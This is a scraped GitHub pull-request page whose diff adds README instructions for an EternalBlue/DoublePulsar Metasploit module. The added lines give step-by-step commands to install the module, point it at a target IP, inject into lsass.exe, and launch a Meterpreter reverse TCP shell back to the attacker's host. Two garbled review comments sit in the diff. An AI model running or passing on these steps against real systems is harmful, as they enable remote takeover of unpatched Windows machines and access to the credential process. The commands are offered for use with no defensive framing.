Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update README.md #64

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
25 changes: 24 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1 +1,24 @@
# Eternalblue-Doublepulsar-Metasploit

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

TiA

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All your Lil Girl's on the cieling with crayola are gonna say that same thing Base belong to ua

# Eternalblue-Doublepulsar-Metasploit

cd Eternalblue-Doublepulsar-Metasploit
mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/

#in msf

use auxiliary/scanner/smb/smb_ms17_010
set DOUBLEPULSARPATH /opt/metasploit/modules/exploits/windows/smb/deps/
set ETERNALBLUEPATH /opt/metasploit/modules/exploits/windows/smb/deps/
set RHOST target_ip


set PROCESSINJECT x
EXAMPLE X = lsass.exe
set TARGETARCHITECTURE x64

set WINEPATH /home/user/.wine/drive_c/
set target X

set payload windows/x64/meterpreter/reverse_tcp
set LHOST YOUR_IP

#exploit